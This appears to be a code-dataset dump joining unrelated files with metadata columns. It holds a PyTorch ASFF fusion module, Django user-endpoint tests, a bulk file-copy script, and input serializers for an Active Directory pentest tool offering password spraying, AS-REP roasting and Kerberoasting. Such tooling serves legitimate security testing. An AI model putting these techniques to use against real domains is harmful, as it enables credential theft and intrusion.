                int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
            # BUGFIX: act_cfg was previously not forwarded here, so this
            # expand conv silently used ConvBase's default activation while
            # every sibling ConvBase call honors the requested one.
            self.expand = ConvBase(self.inter_dim, int(512*multiplier), 3, 1,
                                   act_cfg=act_cfg)
        elif level == 2:
            self.compress_level_0 = ConvBase(
                int(512*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
            # No compress conv for level 1: with this dim table it already
            # has inter_dim channels (256 * multiplier).
            self.expand = ConvBase(self.inter_dim, int(
                256*multiplier), 3, 1, act_cfg=act_cfg)
        # when adding rfb, we use half number of channels to save memory
        compress_c = 8 if rfb else 16
        # One weight branch per level, then a 1x1 conv producing the three
        # (pre-softmax) fusion-weight maps.
        self.weight_level_0 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_level_1 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_level_2 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_levels = nn.Conv2d(
            compress_c*3, 3, kernel_size=1, stride=1, padding=0)
        self.vis = vis

    def forward(self, x_level_0, x_level_1, x_level_2):
        """
        from small -> large

        Returns the fused map, plus the weights and the channel-summed
        pre-expand map when ``self.vis`` is set.
        """
        if self.level == 0:
            level_0_resized = x_level_0
            level_1_resized = self.stride_level_1(x_level_1)
            # Max-pool first so a single stride-2 conv bridges the 4x gap.
            level_2_downsampled_inter = F.max_pool2d(
                x_level_2, 3, stride=2, padding=1)
            level_2_resized = self.stride_level_2(level_2_downsampled_inter)
        elif self.level == 1:
            level_0_compressed = self.compress_level_0(x_level_0)
            level_0_resized = F.interpolate(
                level_0_compressed, scale_factor=2, mode='nearest')
            level_1_resized = x_level_1
            level_2_resized = self.stride_level_2(x_level_2)
        elif self.level == 2:
            level_0_compressed = self.compress_level_0(x_level_0)
            level_0_resized = F.interpolate(
                level_0_compressed, scale_factor=4, mode='nearest')
            level_1_resized = F.interpolate(
                x_level_1, scale_factor=2, mode='nearest')
            level_2_resized = x_level_2
        level_0_weight_v = self.weight_level_0(level_0_resized)
        level_1_weight_v = self.weight_level_1(level_1_resized)
        level_2_weight_v = self.weight_level_2(level_2_resized)
        levels_weight_v = torch.cat(
            (level_0_weight_v, level_1_weight_v, level_2_weight_v), 1)
        levels_weight = self.weight_levels(levels_weight_v)
        # Per-pixel convex combination over the three levels.
        levels_weight = F.softmax(levels_weight, dim=1)
        fused_out_reduced = level_0_resized * levels_weight[:, 0:1, :, :] +\
            level_1_resized * levels_weight[:, 1:2, :, :] +\
            level_2_resized * levels_weight[:, 2:, :, :]
        out = self.expand(fused_out_reduced)
        if self.vis:
            return out, levels_weight, fused_out_reduced.sum(dim=1)
        else:
            return out
class ASFFV5(nn.Module):
    """Adaptively Spatial Feature Fusion head tailored to YoloV5's pyramid.

    Resizes all three inputs to the resolution of ``level`` and fuses them
    with per-pixel softmax weights before a final 3x3 "expand" conv.
    """
    def __init__(self, level, multiplier=1, rfb=False, vis=False, act_cfg=dict(type='LeakyReLU')):
        """
        this is ASFF version for YoloV5 only.
        Since YoloV5 outputs 3 layer of feature maps with different channels
        which is different than YoloV3
        normally, multiplier should be 1, 0.5
        which means, the channel of ASFF can be
        512, 256, 128 -> multiplier=1
        256, 128, 64 -> multiplier=0.5
        For even smaller, you gonna need change code manually.
        If you got any question about this, consult me via wechat: jintianiloveu
        """
        super(ASFFV5, self).__init__()
        self.level = level
        # Input channel counts per level, index 0 = coarsest.
        self.dim = [int(1024*multiplier), int(512*multiplier),
                    int(256*multiplier)]
        self.inter_dim = self.dim[self.level]
        if level == 0:
            # Downsample the two finer levels with stride-2 3x3 convs.
            self.stride_level_1 = ConvBase(
                int(512*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
            self.stride_level_2 = ConvBase(
                int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
            self.expand = ConvBase(self.inter_dim, int(
                1024*multiplier), 3, 1, act_cfg=act_cfg)
        elif level == 1:
            self.compress_level_0 = ConvBase(
                int(1024*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
            self.stride_level_2 = ConvBase(
                int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
            # BUGFIX: act_cfg was previously not forwarded here, so this
            # expand conv silently used ConvBase's default activation while
            # every sibling ConvBase call honors the requested one.
            self.expand = ConvBase(self.inter_dim, int(512*multiplier), 3, 1,
                                   act_cfg=act_cfg)
        elif level == 2:
            # Compress both coarser levels down to level 2's channel count.
            self.compress_level_0 = ConvBase(
                int(1024*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
            self.compress_level_1 = ConvBase(
                int(512*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
            self.expand = ConvBase(self.inter_dim, int(
                256*multiplier), 3, 1, act_cfg=act_cfg)
        # when adding rfb, we use half number of channels to save memory
        compress_c = 8 if rfb else 16
        # One weight branch per level, then a 1x1 conv producing the three
        # (pre-softmax) fusion-weight maps.
        self.weight_level_0 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_level_1 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_level_2 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_levels = nn.Conv2d(
            compress_c*3, 3, kernel_size=1, stride=1, padding=0)
        self.vis = vis

    def forward(self, x_level_0, x_level_1, x_level_2):
        """
        # 128, 256, 512
        512, 256, 128
        from small -> large

        Returns the fused map, plus the weights and the channel-summed
        pre-expand map when ``self.vis`` is set.
        """
        if self.level == 0:
            level_0_resized = x_level_0
            level_1_resized = self.stride_level_1(x_level_1)
            # Max-pool first so a single stride-2 conv bridges the 4x gap.
            level_2_downsampled_inter = F.max_pool2d(
                x_level_2, 3, stride=2, padding=1)
            level_2_resized = self.stride_level_2(level_2_downsampled_inter)
        elif self.level == 1:
            level_0_compressed = self.compress_level_0(x_level_0)
            level_0_resized = F.interpolate(
                level_0_compressed, scale_factor=2, mode='nearest')
            level_1_resized = x_level_1
            level_2_resized = self.stride_level_2(x_level_2)
        elif self.level == 2:
            level_0_compressed = self.compress_level_0(x_level_0)
            level_0_resized = F.interpolate(
                level_0_compressed, scale_factor=4, mode='nearest')
            x_level_1_compressed = self.compress_level_1(x_level_1)
            level_1_resized = F.interpolate(
                x_level_1_compressed, scale_factor=2, mode='nearest')
            level_2_resized = x_level_2
        level_0_weight_v = self.weight_level_0(level_0_resized)
        level_1_weight_v = self.weight_level_1(level_1_resized)
        level_2_weight_v = self.weight_level_2(level_2_resized)
        levels_weight_v = torch.cat(
            (level_0_weight_v, level_1_weight_v, level_2_weight_v), 1)
        levels_weight = self.weight_levels(levels_weight_v)
        # Per-pixel convex combination over the three levels.
        levels_weight = F.softmax(levels_weight, dim=1)
        fused_out_reduced = level_0_resized * levels_weight[:, 0:1, :, :] +\
            level_1_resized * levels_weight[:, 1:2, :, :] +\
            level_2_resized * levels_weight[:, 2:, :, :]
        out = self.expand(fused_out_reduced)
        if self.vis:
            return out, levels_weight, fused_out_reduced.sum(dim=1)
        else:
            return out
| 42.109325
| 98
| 0.615913
| 1,864
| 13,096
| 3.988734
| 0.082618
| 0.058911
| 0.061332
| 0.053262
| 0.909617
| 0.89657
| 0.8846
| 0.879892
| 0.86039
| 0.859987
| 0
| 0.05754
| 0.286042
| 13,096
| 310
| 99
| 42.245161
| 0.737647
| 0.107056
| 0
| 0.880734
| 0
| 0
| 0.007611
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027523
| false
| 0
| 0.022936
| 0
| 0.091743
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f7991be7d20b4c52bbf7ad03a0436ffc67b4aee
| 19,705
|
py
|
Python
|
osmchadjango/users/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/users/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/users/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
from django.urls import reverse
from rest_framework.test import APITestCase
from social_django.models import UserSocialAuth
from ..models import User, MappingTeam
from ...changeset.tests.modelfactories import ChangesetFactory
from ...changeset.models import Changeset
class TestCurrentUserDetailAPIView(APITestCase):
    """Tests for the users:detail endpoint (current user's profile)."""

    def setUp(self):
        self.user = User.objects.create_user(
            username='test', password='password', email='a@a.com')
        self.social_auth = UserSocialAuth.objects.create(
            user=self.user, provider='openstreetmap', uid='123123')
        self.social_auth.set_extra_data({'avatar': 'http://theurl.org/pic.jpg'})
        self.url = reverse('users:detail')

    def test_view_unauthenticated(self):
        self.assertEqual(self.client.get(self.url).status_code, 401)

    def test_get_view(self):
        self.client.login(username='test', password='password')
        resp = self.client.get(self.url)
        self.assertEqual(resp.status_code, 200)
        expected = {
            'id': self.user.id,
            'username': 'test',
            'email': 'a@a.com',
            'uid': '123123',
            'is_staff': False,
            'is_active': True,
            'avatar': 'http://theurl.org/pic.jpg',
            'whitelists': [],
        }
        for field, value in expected.items():
            self.assertEqual(resp.data.get(field), value)
        self.assertFalse(resp.data.get('comment_feature'))
        # The serializer must never expose the password.
        self.assertFalse('password' in resp.data.keys())

    def test_update_view(self):
        self.client.login(username='test', password='password')
        payload = {
            "username": "test_user",
            "email": "admin@a.com",
            "is_staff": "true",
            "message_good": "Hello! Awesome edit!",
            "message_bad": "Hello! I found an error in your edit...",
            "comment_feature": True
        }
        self.assertEqual(self.client.put(self.url, payload).status_code, 200)
        resp = self.client.get(self.url)
        # email/messages/comment_feature change; username and is_staff
        # must stay as they were.
        self.assertEqual(resp.data.get('email'), 'admin@a.com')
        self.assertEqual(resp.data.get('username'), 'test')
        self.assertFalse(resp.data.get('is_staff'))
        self.assertEqual(resp.data.get('message_good'),
                         'Hello! Awesome edit!')
        self.assertEqual(resp.data.get('message_bad'),
                         'Hello! I found an error in your edit...')
        self.assertTrue(resp.data.get('comment_feature'))

    def test_username_serialization(self):
        # When User.name is set, it is serialized as the username.
        self.user.name = 'test user'
        self.user.save()
        self.client.login(username='test', password='password')
        resp = self.client.get(self.url)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.data.get('id'), self.user.id)
        self.assertEqual(resp.data.get('username'), 'test user')

    def test_uid_field_of_non_social_user(self):
        self.user_2 = User.objects.create_user(
            username='test_2', password='password', email='b@a.com')
        self.client.login(username='test_2', password='password')
        resp = self.client.get(self.url)
        self.assertEqual(resp.data.get('uid'), None)
        self.assertEqual(resp.data.get('avatar'), None)
class TestSocialAuthAPIView(APITestCase):
    """Tests for the users:social-auth endpoint."""

    def setUp(self):
        self.url = reverse('users:social-auth')

    def test_get_response(self):
        # Only POST is accepted on this endpoint.
        self.assertEqual(self.client.get(self.url).status_code, 405)

    def test_receive_oauth_token(self):
        resp = self.client.post(self.url)
        self.assertEqual(resp.status_code, 200)
        for key in ('oauth_token', 'oauth_token_secret'):
            self.assertIn(key, resp.data.keys())
class TestMappingTeamListCreateAPIView(APITestCase):
    """Tests for listing, creating and filtering mapping teams."""

    def setUp(self):
        self.url = reverse('users:mapping-team')
        self.user = User.objects.create_user(
            username='test', password='password', email='a@a.com')
        self.social_auth = UserSocialAuth.objects.create(
            user=self.user, provider='openstreetmap', uid='123123')
        self.payload = {
            "name": "Map Company",
            "users": [
                {"username": "test_1", "doj": "2017-02-13T00:00:00Z",
                 "uid": "989", "dol": ""},
                {"username": "test_2", "doj": "2017-02-13T00:00:00Z",
                 "uid": "987", "dol": ""},
            ],
            "trusted": True
        }

    def test_unauthenticated(self):
        self.assertEqual(
            self.client.post(self.url, data=self.payload).status_code, 401)
        self.assertEqual(self.client.get(self.url).status_code, 401)

    def test_create_authenticated(self):
        self.client.login(username='test', password='password')
        resp = self.client.post(self.url, data=self.payload)
        self.assertEqual(resp.status_code, 201)
        self.assertEqual(MappingTeam.objects.count(), 1)
        # The "trusted" flag from the payload is ignored on creation.
        self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
        self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
        resp = self.client.get(self.url)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(len(resp.data.get('results')), 1)
        first = resp.json().get('results')[0]
        for key in ("name", "users", "trusted"):
            self.assertTrue(key in first.keys())

    def test_filters(self):
        self.client.login(username='test', password='password')
        self.client.post(self.url, data=self.payload)
        # (query params, expected count); the owner filter is exact and
        # case-sensitive, the name filter matches substrings.
        cases = [
            ({'trusted': 'true'}, 0),
            ({'trusted': 'false'}, 1),
            ({'name': 'Map Company'}, 1),
            ({'name': 'Map'}, 1),
            ({'name': 'Other'}, 0),
            ({'owner': 'test'}, 1),
            ({'owner': 'other user'}, 0),
            ({'owner': 'Test'}, 0),
        ]
        for params, expected in cases:
            resp = self.client.get(self.url, params)
            self.assertEqual(resp.status_code, 200)
            self.assertEqual(resp.data.get('count'), expected)
class TestMappingTeamDetailAPIView(APITestCase):
    """Permission tests for the users:mapping-team-detail endpoint."""

    def setUp(self):
        self.user = User.objects.create_user(
            username='test', password='password', email='a@a.com')
        self.social_auth = UserSocialAuth.objects.create(
            user=self.user, provider='openstreetmap', uid='123123')
        self.payload = {
            "name": "Map Company",
            "users": [
                {"username": "test_1", "doj": "2017-02-13T00:00:00Z",
                 "uid": "989", "dol": ""},
                {"username": "test_2", "doj": "2017-02-13T00:00:00Z",
                 "uid": "987", "dol": ""},
            ],
            "trusted": True
        }
        self.team = MappingTeam.objects.create(
            name="Group of Users", users=self.payload, created_by=self.user)

    def _detail_url(self):
        # URL for the team created in setUp.
        return reverse('users:mapping-team-detail', args=[self.team.id])

    def test_unauthenticated(self):
        url = self._detail_url()
        self.assertEqual(self.client.get(url).status_code, 401)
        self.assertEqual(self.client.put(url, data=self.payload).status_code, 401)
        self.assertEqual(self.client.patch(url, data=self.payload).status_code, 401)
        self.assertEqual(self.client.delete(url).status_code, 401)

    def test_with_owner(self):
        url = self._detail_url()
        self.client.login(username='test', password='password')
        self.assertEqual(self.client.get(url).status_code, 200)
        self.assertEqual(self.client.put(url, data=self.payload).status_code, 200)
        self.assertEqual(self.client.patch(url, data=self.payload).status_code, 200)
        # Updating must not flip the trusted flag.
        self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
        self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
        self.assertEqual(self.client.delete(url).status_code, 204)
        self.assertEqual(MappingTeam.objects.count(), 0)

    def test_with_staff_user(self):
        User.objects.create_user(
            username='staff_user', password='password', email='a@a.com',
            is_staff=True)
        url = self._detail_url()
        self.client.login(username='staff_user', password='password')
        self.assertEqual(self.client.get(url).status_code, 200)
        self.assertEqual(self.client.put(url, data=self.payload).status_code, 200)
        self.assertEqual(self.client.patch(url, data=self.payload).status_code, 200)
        self.assertEqual(self.client.delete(url).status_code, 204)

    def test_with_other_user(self):
        User.objects.create_user(
            username='test_2', password='password', email='a@a.com')
        url = self._detail_url()
        self.client.login(username='test_2', password='password')
        # Non-owners may read but not modify or delete.
        self.assertEqual(self.client.get(url).status_code, 200)
        self.assertEqual(self.client.put(url, data=self.payload).status_code, 403)
        self.assertEqual(self.client.patch(url, data=self.payload).status_code, 403)
        self.assertEqual(self.client.delete(url).status_code, 403)
class TestMappingTeamTrustingAPIView(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test',
password='password',
email='a@a.com'
)
self.social_auth = UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.payload = {
"name": "Map Company",
"users": [
{
"username" : "test_1",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "989",
"dol" : ""
},
{
"username" : "test_2",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "987",
"dol" : ""
}
],
"trusted": True
}
self.team = MappingTeam.objects.create(
name="Group of Users",
users=self.payload,
created_by=self.user
)
def test_unauthenticated(self):
url = reverse('users:trust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 401)
url = reverse('users:untrust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 401)
def test_with_owner(self):
url = reverse('users:trust-mapping-team', args=[self.team.id])
self.client.login(username='test', password='password')
response = self.client.put(url)
self.assertEqual(response.status_code, 403)
url = reverse('users:untrust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 403)
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
def test_with_staff_user(self):
user = User.objects.create_user(
username='staff_user',
password='password',
email='a@a.com',
is_staff=True
)
url = reverse('users:trust-mapping-team', args=[self.team.id])
self.client.login(username='staff_user', password='password')
response = self.client.put(url)
self.assertEqual(response.status_code, 200)
self.team.refresh_from_db()
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 0)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 1)
url = reverse('users:untrust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 200)
self.team.refresh_from_db()
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
def test_with_other_user(self):
    """A non-staff user who is not the team owner gets 403 and the
    trusted flag stays False.

    Fix: the created User was bound to an unused local; only the DB side
    effect is needed, so the binding is dropped.
    """
    User.objects.create_user(
        username='test_2',
        password='password',
        email='a@a.com'
    )
    self.client.login(username='test_2', password='password')
    url = reverse('users:trust-mapping-team', args=[self.team.id])
    response = self.client.put(url)
    self.assertEqual(response.status_code, 403)
    url = reverse('users:untrust-mapping-team', args=[self.team.id])
    response = self.client.put(url)
    self.assertEqual(response.status_code, 403)
    self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
    self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
    # NOTE(review): the statements below create a staff user and social
    # auth entry but nothing is asserted afterwards — this looks like
    # copy-paste residue from a setUp method. Confirm and remove if unused.
    self.staff_user = User.objects.create_user(
        username='staff',
        password='password',
        email='a@a.com',
        is_staff=True
    )
    UserSocialAuth.objects.create(
        user=self.staff_user,
        provider='openstreetmap',
        uid='123456',
    )
class TestUpdateDeletedUsersView(APITestCase):
    """Tests for the staff-only 'update-deleted-users' POST endpoint.

    The assertions in test_view establish the expected behaviour: for each
    posted OSM uid, changeset usernames and the matching local User are
    renamed to 'user_<uid>'.
    """

    def setUp(self):
        self.url = reverse('users:update-deleted-users')
        # Two OSM accounts with 50 changesets each.
        ChangesetFactory.create_batch(50, uid="1769", user="test_user")
        ChangesetFactory.create_batch(50, uid="1234", user="old_user")
        # Ordinary (non-staff) user with a linked OSM identity.
        self.user = User.objects.create_user(
            username='test',
            password='password',
            email='a@a.com'
        )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
        )
        # Staff user allowed to call the endpoint.
        self.staff_user = User.objects.create_user(
            username='staff',
            password='password',
            email='a@a.com',
            is_staff=True
        )
        UserSocialAuth.objects.create(
            user=self.staff_user,
            provider='openstreetmap',
            uid='123456',
        )

    def test_unauthenticated(self):
        """Anonymous requests are rejected with 401."""
        request = self.client.post(self.url, data={'uids': [1769, 1234]})
        self.assertEqual(request.status_code, 401)

    def test_non_staff_user(self):
        """Authenticated but non-staff users are rejected with 403."""
        self.client.login(username=self.user.username, password='password')
        request = self.client.post(self.url, data={'uids': [1769, 1234]})
        self.assertEqual(request.status_code, 403)

    def test_bad_request(self):
        """A missing or misnamed 'uids' payload key yields 400."""
        self.client.login(username=self.staff_user.username, password='password')
        request = self.client.post(self.url)
        self.assertEqual(request.status_code, 400)
        # 'uid' (singular) is not the expected payload key.
        request = self.client.post(self.url, data={'uid': [1769, 1234]})
        self.assertEqual(request.status_code, 400)

    def test_view(self):
        """Posted uids rename matching users and changesets to 'user_<uid>'."""
        user = User.objects.create_user(
            username='test_user',
            password='password',
            email='a@a.com'
        )
        UserSocialAuth.objects.create(
            user=user,
            provider='openstreetmap',
            uid='1769',
        )
        user_2 = User.objects.create_user(
            username='old_user',
            password='password',
            email='a@a.com'
        )
        UserSocialAuth.objects.create(
            user=user_2,
            provider='openstreetmap',
            uid='1234',
        )
        self.client.login(username=self.staff_user.username, password='password')
        request = self.client.post(self.url, data={'uids': [1769, 1234]})
        self.assertEqual(request.status_code, 200)
        # Changesets keep their uid but their username is anonymised.
        self.assertEqual(Changeset.objects.filter(uid='1769').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='user_1769').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='test_user').count(), 0)
        self.assertEqual(Changeset.objects.filter(uid='1234').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='user_1234').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='old_user').count(), 0)
        # Local User rows are renamed as well.
        self.assertEqual(User.objects.filter(username='old_user').count(), 0)
        self.assertEqual(User.objects.filter(username='test_user').count(), 0)
        self.assertEqual(User.objects.filter(username='user_1234').count(), 1)
        self.assertEqual(User.objects.filter(username='user_1769').count(), 1)

    def test_view_as_strings(self):
        """uids posted as strings are handled the same as integers."""
        self.client.login(username=self.staff_user.username, password='password')
        request = self.client.post(self.url, data={'uids': ['1769', '1234']})
        self.assertEqual(request.status_code, 200)
        self.assertEqual(Changeset.objects.filter(uid='1769').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='user_1769').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='test_user').count(), 0)
        self.assertEqual(Changeset.objects.filter(uid='1234').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='user_1234').count(), 50)
        self.assertEqual(Changeset.objects.filter(user='old_user').count(), 0)
| 38.942688
| 82
| 0.596245
| 2,173
| 19,705
| 5.318914
| 0.072711
| 0.133674
| 0.131338
| 0.105382
| 0.891158
| 0.859145
| 0.832497
| 0.799706
| 0.768472
| 0.74416
| 0
| 0.031705
| 0.265313
| 19,705
| 505
| 83
| 39.019802
| 0.766664
| 0
| 0
| 0.672727
| 0
| 0
| 0.113981
| 0.016544
| 0
| 0
| 0
| 0
| 0.254545
| 1
| 0.065909
| false
| 0.070455
| 0.013636
| 0
| 0.093182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3f8f6de8fd2d63c911589b035d7ba54d95814173
| 358
|
py
|
Python
|
src/main/resources/assets/tiny_tintato/models/item/duplicate.py
|
hYdos/heresYourCopperCoppa
|
ff7c49cb13fe1f32d8f8029b96b18282daf7aad0
|
[
"CC0-1.0"
] | null | null | null |
src/main/resources/assets/tiny_tintato/models/item/duplicate.py
|
hYdos/heresYourCopperCoppa
|
ff7c49cb13fe1f32d8f8029b96b18282daf7aad0
|
[
"CC0-1.0"
] | null | null | null |
src/main/resources/assets/tiny_tintato/models/item/duplicate.py
|
hYdos/heresYourCopperCoppa
|
ff7c49cb13fe1f32d8f8029b96b18282daf7aad0
|
[
"CC0-1.0"
] | null | null | null |
from shutil import copyfile


def duplicate_model_files(src, dst_template, count):
    """Copy *src* to ``count`` numbered destination files.

    Parameters
    ----------
    src : str
        Path of the template file to duplicate.
    dst_template : str
        Destination path containing a ``{}`` placeholder for the index.
    count : int
        Number of copies to create (indices ``0 .. count - 1``).
    """
    # A bounded for-loop replaces the original `while (i != 69421)` counter.
    for i in range(count):
        copyfile(src, dst_template.format(i))


if __name__ == '__main__':
    # Original behaviour: 69421 copies of tin_.json named tin_0.json .. tin_69420.json.
    base = ("/home/hayden/Documents/Projects/heresYourCopperCoppa/"
            "src/main/resources/assets/tiny_tintato/models/item/tin_")
    duplicate_model_files(base + ".json", base + "{}.json", 69421)
| 39.777778
| 139
| 0.731844
| 49
| 358
| 5.265306
| 0.530612
| 0.077519
| 0.147287
| 0.209302
| 0.72093
| 0.72093
| 0.72093
| 0.72093
| 0.72093
| 0.72093
| 0
| 0.022364
| 0.125698
| 358
| 8
| 140
| 44.75
| 0.801917
| 0
| 0
| 0
| 0
| 0.285714
| 0.631285
| 0.617318
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3fe2132a3833de52a458263d715fbd0abb2130b4
| 3,241
|
py
|
Python
|
pentestui/pentest_api/serializers.py
|
mustgundogdu/PentestUI
|
92263ea73bd2eaa2081fb277c76aa229103a1d54
|
[
"Apache-2.0"
] | 21
|
2021-07-26T05:19:45.000Z
|
2022-02-01T07:35:21.000Z
|
pentestui/pentest_api/serializers.py
|
mustgundogdu/PentestUI
|
92263ea73bd2eaa2081fb277c76aa229103a1d54
|
[
"Apache-2.0"
] | null | null | null |
pentestui/pentest_api/serializers.py
|
mustgundogdu/PentestUI
|
92263ea73bd2eaa2081fb277c76aa229103a1d54
|
[
"Apache-2.0"
] | 2
|
2021-09-21T06:52:10.000Z
|
2021-09-26T07:31:27.000Z
|
from rest_framework import serializers
class SpnEnumSerializer(serializers.Serializer):
    """Input fields (target server and AD credentials) for the SPN
    enumeration API view."""
    # NOTE(review): all serializers in this module share these four
    # credential fields; a common base class would remove the duplication.
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
class DomainAdminsSerializer(serializers.Serializer):
    """Input fields for the group-member (Domain Admins) API view."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
class DfsharesSerializer(serializers.Serializer):
    """Input fields for the DFS shares API view."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
class DomainControllersSerializer(serializers.Serializer):
    """Input fields for the domain controllers API view."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
class SensitiveDataSerializer(serializers.Serializer):
    """Input fields for the sensitive-data search view; ``Search_Data``
    carries the search term (max 75 characters)."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
    Search_Data = serializers.CharField(max_length=75)
class DnsZoneSerializer(serializers.Serializer):
    """Input fields for the DNS zone API view."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
class PreAuthUserSerializer(serializers.Serializer):
    """Input fields for the pre-auth user API view."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
class PasswordSpraySerializer(serializers.Serializer):
    """Input fields for the password-spray view; ``Spray_Password`` is
    the candidate password to spray (max 90 characters)."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
    Spray_Password = serializers.CharField(max_length=90)
class AsrepRoastingSerializer(serializers.Serializer):
    """Input fields for the AS-REP roasting attack view."""
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
class KerberoastinSerializer(serializers.Serializer):
    """Input fields for the Kerberoasting attack view."""
    # NOTE: the class name is missing the trailing 'g' ("Kerberoasting");
    # renaming would break existing importers, so it is left as is.
    Server_Ip = serializers.CharField(max_length=20)
    Domain_Name = serializers.CharField(max_length=50)
    User_Name = serializers.CharField(max_length=30)
    Password = serializers.CharField(max_length=35)
| 43.797297
| 62
| 0.777538
| 377
| 3,241
| 6.485411
| 0.137931
| 0.343558
| 0.395092
| 0.49816
| 0.788957
| 0.773824
| 0.773824
| 0.773824
| 0.773824
| 0.773824
| 0
| 0.029798
| 0.130207
| 3,241
| 73
| 63
| 44.39726
| 0.837531
| 0.099969
| 0
| 0.754717
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.226415
| 0.018868
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
